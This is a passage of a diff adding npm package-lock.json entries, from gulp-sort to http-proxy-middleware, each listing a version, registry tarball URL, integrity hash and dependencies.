"https://registry.npmjs.org/gulp-sort/-/gulp-sort-2.0.0.tgz", + "integrity": "sha1-xnYqLx8N4KP8WVohWZ0/rI26Gso=", + "dev": true, + "dependencies": { + "through2": 
"^2.0.1" + } + }, + "node_modules/gulp-sort/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=", + "dev": true + }, + "node_modules/gulp-sort/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dev": true, + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/gulp-sort/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dev": true, + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/gulp-sort/node_modules/through2": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/through2/-/through2-2.0.5.tgz", + "integrity": "sha512-/mrRod8xqpA+IHSLyGCQ2s8SPHiCDEeQJSep1jqLYeEUClOFG2Qsh+4FU6G9VeqpZnGW/Su8LQGc4YKni5rYSQ==", + "dev": true, + "dependencies": { + "readable-stream": "~2.3.6", + "xtend": "~4.0.1" + } + }, + "node_modules/handle-thing": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/handle-thing/-/handle-thing-2.0.1.tgz", + "integrity": "sha512-9Qn4yBxelxoh2Ow62nP+Ka/kMnOXRi8BXnRaUwezLNhqelnN49xKz4F/dPP8OYLxLxq6JDtZb2i9XznUQbNPTg==", + "dev": true, + "license": "MIT" + }, + "node_modules/handlebars": { + "version": "4.7.8", + "resolved": "https://registry.npmjs.org/handlebars/-/handlebars-4.7.8.tgz", + "integrity": "sha512-vafaFqs8MZkRrSX7sFVUdo3ap/eNiLnb4IakshzvP56X5Nr1iGKAIqdX6tMlm6HcNRIkr6AxO5jFEoJzzpT8aQ==", + "dev": true, + "dependencies": { + "minimist": "^1.2.5", + "neo-async": "^2.6.2", + "source-map": "^0.6.1", + "wordwrap": "^1.0.0" + }, + "bin": { + "handlebars": "bin/handlebars" + }, + "engines": { + "node": ">=0.4.7" + }, + "optionalDependencies": { + "uglify-js": "^3.1.4" + } + }, + "node_modules/handlebars-loader": { + "version": "1.7.3", + "resolved": "https://registry.npmjs.org/handlebars-loader/-/handlebars-loader-1.7.3.tgz", + "integrity": "sha512-dDb+8D51vE3OTSE2wuGPWRAegtsEuw8Mk8hCjtRu/pNcBfN5q+M8ZG3kVJxBuOeBrVElpFStipGmaxSBTRR1mQ==", + "dev": true, + "dependencies": { + "async": "^3.2.2", + "fastparse": "^1.0.0", + "loader-utils": "1.4.x", + "object-assign": "^4.1.0" + }, + "peerDependencies": { + "handlebars": ">= 1.3.0 < 5" + } + }, + "node_modules/handlebars-loader/node_modules/big.js": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "integrity": "sha512-vyL2OymJxmarO8gxMr0mhChsO9QGwhynfuu4+MHTAW6czfq9humCB7rKpUjDd9YUiDPU4mzpyupFSvOClAwbmQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/handlebars-loader/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/handlebars-loader/node_modules/loader-utils": { + "version": "1.4.2", + "resolved": 
"https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.2.tgz", + "integrity": "sha512-I5d00Pd/jwMD2QCduo657+YM/6L3KZu++pmX9VFncxaxvHcru9jx1lBaFft+r4Mt2jK0Yhp41XlRAihzPxHNCg==", + "dev": true, + "dependencies": { + "big.js": "^5.2.2", + "emojis-list": "^3.0.0", + "json5": "^1.0.1" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/har-schema": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", + "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", + "engines": { + "node": ">=4" + } + }, + "node_modules/har-validator": { + "version": "5.1.5", + "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", + "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "deprecated": "this library is no longer supported", + "dependencies": { + "ajv": "^6.12.3", + "har-schema": "^2.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/has": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", + "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", + "dev": true, + "dependencies": { + "function-bind": "^1.1.1" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/has-bigints": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-bigints/-/has-bigints-1.0.2.tgz", + "integrity": "sha512-tSvCKtBr9lkF0Ex0aQiP9N+OpV4zi2r/Nee5VkRDbaqv35RLYMzbwQfFSZZH0kR+Rd6302UJZ2p/bJCEoR3VoQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/has-property-descriptors": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-property-descriptors/-/has-property-descriptors-1.0.2.tgz", + "integrity": "sha512-55JNKuIW+vq4Ke1BjOTjM2YctQIvCT7GFzHwmfZPGo5wnrgkid0YQtnAleFSqumZm4az3n2BS+erby5ipJdgrg==", + "dependencies": { + "es-define-property": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-proto": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has-proto/-/has-proto-1.0.3.tgz", + "integrity": "sha512-SJ1amZAJUiZS+PhsVLf5tGydlaVB8EdFpaSO4gmiUKUOxk8qzn5AIy4ZeJUmh22znIdk/uMAUT2pl3FxzVUH+Q==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.0.3.tgz", + "integrity": "sha512-l3LCuF6MgDNwTDKkdYGEihYjt5pRPbEg46rtlmnSPlUbgmB8LOIrKJbYYFBSbnPaJexMKtiPO8hmeRjRz2Td+A==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-unicode": { + "version": "2.0.1", + 
"resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", + "integrity": "sha1-4Ob+aijPUROIVeCG0Wkedx3iqLk=" + }, + "node_modules/has-value": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/has-value/-/has-value-1.0.0.tgz", + "integrity": "sha512-IBXk4GTsLYdQ7Rvt+GRBrFSVEkmuOUy4re0Xjd9kJSUQpnTrWR4/y9RpfexN9vkAPMFuQoeWKwqzPozRTlasGw==", + "dev": true, + "dependencies": { + "get-value": "^2.0.6", + "has-values": "^1.0.0", + "isobject": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/has-values/-/has-values-1.0.0.tgz", + "integrity": "sha512-ODYZC64uqzmtfGMEAX/FvZiRyWLpAC3vYnNunURUnkGVTS+mI0smVsWaPydRBsE3g+ok7h960jChO8mFcWlHaQ==", + "dev": true, + "dependencies": { + "is-number": "^3.0.0", + "kind-of": "^4.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values/node_modules/is-number": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-3.0.0.tgz", + "integrity": "sha512-4cboCqIpliH+mAvFNegjZQ4kgKc3ZUhQVr3HvWbSh5q3WH2v82ct+T2Y1hdU5Gdtorx/cLifQjqCbL7bpznLTg==", + "dev": true, + "dependencies": { + "kind-of": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values/node_modules/is-number/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values/node_modules/kind-of": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-4.0.0.tgz", + "integrity": "sha512-24XsCxmEbRwEDbz/qz3stgin8TTzZ1ESR56OMCN0ujYg+vRutNSiOj9bHH9u85DKgXguraugV5sFuvbD4FW/hw==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/he": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/he/-/he-1.2.0.tgz", + "integrity": "sha512-F/1DnUGPopORZi0ni+CvrCgHQ5FyEAHRLSApuYWMmrbSwoN2Mn/7k+Gl38gJnR7yyDZk6WLXwiGod1JOWNDKGw==", + "dev": true, + "bin": { + "he": "bin/he" + } + }, + "node_modules/helmet": { + "version": "3.23.3", + "resolved": "https://registry.npmjs.org/helmet/-/helmet-3.23.3.tgz", + "integrity": "sha512-U3MeYdzPJQhtvqAVBPntVgAvNSOJyagwZwyKsFdyRa8TV3pOKVFljalPOCxbw5Wwf2kncGhmP0qHjyazIdNdSA==", + "dependencies": { + "depd": "2.0.0", + "dont-sniff-mimetype": "1.1.0", + "feature-policy": "0.3.0", + "helmet-crossdomain": "0.4.0", + "helmet-csp": "2.10.0", + "hide-powered-by": "1.1.0", + "hpkp": "2.0.0", + "hsts": "2.2.0", + "nocache": "2.1.0", + "referrer-policy": "1.2.0", + "x-xss-protection": "1.3.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/helmet-crossdomain": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/helmet-crossdomain/-/helmet-crossdomain-0.4.0.tgz", + "integrity": "sha512-AB4DTykRw3HCOxovD1nPR16hllrVImeFp5VBV9/twj66lJ2nU75DP8FPL0/Jp4jj79JhTfG+pFI2MD02kWJ+fA==", + "engines": { + 
"node": ">=4.0.0" + } + }, + "node_modules/helmet-csp": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/helmet-csp/-/helmet-csp-2.10.0.tgz", + "integrity": "sha512-Rz953ZNEFk8sT2XvewXkYN0Ho4GEZdjAZy4stjiEQV3eN7GDxg1QKmYggH7otDyIA7uGA6XnUMVSgeJwbR5X+w==", + "dependencies": { + "bowser": "2.9.0", + "camelize": "1.0.0", + "content-security-policy-builder": "2.1.0", + "dasherize": "2.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/helmet-csp/node_modules/bowser": { + "version": "2.9.0", + "resolved": "https://registry.npmjs.org/bowser/-/bowser-2.9.0.tgz", + "integrity": "sha512-2ld76tuLBNFekRgmJfT2+3j5MIrP6bFict8WAIT3beq+srz1gcKNAdNKMqHqauQt63NmAa88HfP1/Ypa9Er3HA==" + }, + "node_modules/helmet/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/hexer": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/hexer/-/hexer-1.5.0.tgz", + "integrity": "sha512-dyrPC8KzBzUJ19QTIo1gXNqIISRXQ0NwteW6OeQHRN4ZuZeHkdODfj0zHBdOlHbRY8GqbqK57C9oWSvQZizFsg==", + "dependencies": { + "ansi-color": "^0.2.1", + "minimist": "^1.1.0", + "process": "^0.10.0", + "xtend": "^4.0.0" + }, + "bin": { + "hexer": "cli.js" + }, + "engines": { + "node": ">= 0.10.x" + } + }, + "node_modules/hexer/node_modules/process": { + "version": "0.10.1", + "resolved": "https://registry.npmjs.org/process/-/process-0.10.1.tgz", + "integrity": "sha512-dyIett8dgGIZ/TXKUzeYExt7WA6ldDzys9vTDU/cCA9L17Ypme+KzS+NjQCjpn9xsvi/shbMC+yP/BcFMBz0NA==", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/hexoid": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/hexoid/-/hexoid-1.0.0.tgz", + "integrity": "sha512-QFLV0taWQOZtvIRIAdBChesmogZrtuXvVWsFHZTk2SU+anspqZ2vMnoLg7IE1+Uk16N19APic1BuF8bC8c2m5g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/hide-powered-by": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/hide-powered-by/-/hide-powered-by-1.1.0.tgz", + "integrity": "sha512-Io1zA2yOA1YJslkr+AJlWSf2yWFkKjvkcL9Ni1XSUqnGLr/qRQe2UI3Cn/J9MsJht7yEVCe0SscY1HgVMujbgg==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/hoist-non-react-statics": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/hoist-non-react-statics/-/hoist-non-react-statics-3.3.2.tgz", + "integrity": "sha512-/gGivxi8JPKWNm/W0jSmzcMPpfpPLc3dY/6GxhX2hQ9iGj3aDfklV4ET7NjKpSinLpJ5vafa9iiGIEZg10SfBw==", + "dependencies": { + "react-is": "^16.7.0" + } + }, + "node_modules/hoist-non-react-statics/node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" + }, + "node_modules/hosted-git-info": { + "version": "2.8.9", + "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", + "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==", + "dev": true + }, + "node_modules/hpack.js": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/hpack.js/-/hpack.js-2.1.6.tgz", + "integrity": "sha512-zJxVehUdMGIKsRaNt7apO2Gqp0BdqW5yaiGHXXmbpvxgBYVZnAql+BJb4RO5ad2MgpbZKn5G6nMnegrH1FcNYQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "inherits": "^2.0.1", + 
"obuf": "^1.0.0", + "readable-stream": "^2.0.1", + "wbuf": "^1.1.0" + } + }, + "node_modules/hpack.js/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/hpack.js/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dev": true, + "license": "MIT", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/hpack.js/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dev": true, + "license": "MIT", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/hpkp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/hpkp/-/hpkp-2.0.0.tgz", + "integrity": "sha1-EOFCJk52IVpdMMROxD3mTe5tFnI=" + }, + "node_modules/hsts": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/hsts/-/hsts-2.2.0.tgz", + "integrity": "sha512-ToaTnQ2TbJkochoVcdXYm4HOCliNozlviNsg+X2XQLQvZNI/kCHR9rZxVYpJB3UPcHz80PgxRyWQ7PdU1r+VBQ==", + "dependencies": { + "depd": "2.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/hsts/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/html-encoding-sniffer": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/html-encoding-sniffer/-/html-encoding-sniffer-3.0.0.tgz", + "integrity": "sha512-oWv4T4yJ52iKrufjnyZPkrN0CH3QnrUqdB6In1g5Fe1mia8GmF36gnfNySxoZtxD5+NmYw1EElVXiBk93UeskA==", + "dev": true, + "dependencies": { + "whatwg-encoding": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/html-entities": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/html-entities/-/html-entities-2.5.2.tgz", + "integrity": "sha512-K//PSRMQk4FZ78Kyau+mZurHn3FH0Vwr+H36eE0rPbeYkRRi9YxceYPhuN60UwWorxyKHhqoAJl2OFKa4BVtaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/mdevils" + }, + { + "type": "patreon", + "url": "https://patreon.com/mdevils" + } + ] + }, + "node_modules/html-escaper": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", + "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "dev": true + }, + "node_modules/html-minifier-terser": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/html-minifier-terser/-/html-minifier-terser-6.1.0.tgz", + "integrity": "sha512-YXxSlJBZTP7RS3tWnQw74ooKa6L9b9i9QYXY21eUEvhZ3u9XLfv6OnFsQq6RxkhHygsaUMvYsZRV5rU/OVNZxw==", + "dev": true, + "dependencies": { + "camel-case": "^4.1.2", + "clean-css": "^5.2.2", + "commander": "^8.3.0", + "he": "^1.2.0", + 
"param-case": "^3.0.4", + "relateurl": "^0.2.7", + "terser": "^5.10.0" + }, + "bin": { + "html-minifier-terser": "cli.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/html-minifier-terser/node_modules/commander": { + "version": "8.3.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-8.3.0.tgz", + "integrity": "sha512-OkTL9umf+He2DZkUq8f8J9of7yL6RJKI24dVITBmNfZBmri9zYZQrKkuXiKhyfPSu8tUhnVBB1iKXevvnlR4Ww==", + "dev": true, + "engines": { + "node": ">= 12" + } + }, + "node_modules/html-parse-stringify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/html-parse-stringify/-/html-parse-stringify-3.0.1.tgz", + "integrity": "sha512-KknJ50kTInJ7qIScF3jeaFRpMpE8/lfiTdzf/twXyPBLAGrLRTmkz3AdTnKeh40X8k9L2fdYwEp/42WGXIRGcg==", + "dev": true, + "dependencies": { + "void-elements": "3.1.0" + } + }, + "node_modules/html-tags": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/html-tags/-/html-tags-3.3.1.tgz", + "integrity": "sha512-ztqyC3kLto0e9WbNp0aeP+M3kTt+nbaIveGmUxAtZa+8iFgKLUOD4YKM5j+f3QD89bra7UeumolZHKuOXnTmeQ==", + "dev": true, + "peer": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/html-webpack-plugin": { + "version": "5.5.3", + "resolved": "https://registry.npmjs.org/html-webpack-plugin/-/html-webpack-plugin-5.5.3.tgz", + "integrity": "sha512-6YrDKTuqaP/TquFH7h4srYWsZx+x6k6+FbsTm0ziCwGHDP78Unr1r9F/H4+sGmMbX08GQcJ+K64x55b+7VM/jg==", + "dev": true, + "dependencies": { + "@types/html-minifier-terser": "^6.0.0", + "html-minifier-terser": "^6.0.2", + "lodash": "^4.17.21", + "pretty-error": "^4.0.0", + "tapable": "^2.0.0" + }, + "engines": { + "node": ">=10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/html-webpack-plugin" + }, + "peerDependencies": { + "webpack": "^5.20.0" + } + }, + "node_modules/htmlparser2": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/htmlparser2/-/htmlparser2-6.1.0.tgz", + "integrity": "sha512-gyyPk6rgonLFEDGoeRgQNaEUvdJ4ktTmmUh/h2t7s+M8oPpIPxgNACWa+6ESR57kXstwqPiCut0V8NRpcwgU7A==", + "dev": true, + "funding": [ + "https://github.com/fb55/htmlparser2?sponsor=1", + { + "type": "github", + "url": "https://github.com/sponsors/fb55" + } + ], + "dependencies": { + "domelementtype": "^2.0.1", + "domhandler": "^4.0.0", + "domutils": "^2.5.2", + "entities": "^2.0.0" + } + }, + "node_modules/http-deceiver": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/http-deceiver/-/http-deceiver-1.2.7.tgz", + "integrity": "sha512-LmpOGxTfbpgtGVxJrj5k7asXHCgNZp5nLfp+hWc8QQRqtb7fUy6kRY3BO1h9ddF6yIPYUARgxGOwB42DnxIaNw==", + "dev": true, + "license": "MIT" + }, + "node_modules/http-errors": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.0.tgz", + "integrity": "sha512-FtwrG/euBzaEjYeRqOgly7G0qviiXoJWnvEH2Z1plBdXgbyjv34pHTSb9zoeHMyDy33+DWy5Wt9Wo+TURtOYSQ==", + "dependencies": { + "depd": "2.0.0", + "inherits": "2.0.4", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "toidentifier": "1.0.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-errors/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-errors/node_modules/statuses": { + "version": "2.0.1", + "resolved": 
"https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-graceful-shutdown": { + "version": "3.1.13", + "resolved": "https://registry.npmjs.org/http-graceful-shutdown/-/http-graceful-shutdown-3.1.13.tgz", + "integrity": "sha512-Ci5LRufQ8AtrQ1U26AevS8QoMXDOhnAHCJI3eZu1com7mZGHxREmw3dNj85ftpQokQCvak8nI2pnFS8zyM1M+Q==", + "dev": true, + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/http-graceful-shutdown/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/http-graceful-shutdown/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/http-parser-js": { + "version": "0.5.10", + "resolved": "https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz", + "integrity": "sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==", + "dev": true, + "license": "MIT" + }, + "node_modules/http-proxy": { + "version": "1.18.1", + "resolved": "https://registry.npmjs.org/http-proxy/-/http-proxy-1.18.1.tgz", + "integrity": "sha512-7mz/721AbnJwIVbnaSv1Cz3Am0ZLT/UBwkC92VlxhXv/k/BBQfM2fXElQNC27BVGr0uwUpplYPQM9LnaBMR5NQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "eventemitter3": "^4.0.0", + "follow-redirects": "^1.0.0", + "requires-port": "^1.0.0" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/http-proxy-agent": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz", + "integrity": "sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==", + "dependencies": { + "@tootallnate/once": "2", + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/http-proxy-middleware": { + "version": "2.0.9", + "resolved": "https://registry.npmjs.org/http-proxy-middleware/-/http-proxy-middleware-2.0.9.tgz", + "integrity": "sha512-c1IyJYLYppU574+YI7R4QyX2ystMtVXZwIdzazUIPIJsHuWNd+mho2j+bKoHftndicGj9yh+xjd+l0yj7VeT1Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/http-proxy": "^1.17.8", + "http-proxy": "^1.18.1", + "is-glob": "^4.0.1", + "is-plain-obj": "^3.0.0", + "micromatch": "^4.0.2" + }, + "engines": { + "node": ">=12.0.0" + }, + "peerDependencies": { + "@types/express": "^4.17.13" + }, + "peerDependenciesMeta": { + "@types/express": { + "optional": true + } + } + }, + "node_modules/http-proxy-middleware/node_modules/is-plain-obj": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-plain-obj/-/is-plain-obj-3.0.0.tgz", + "integrity": 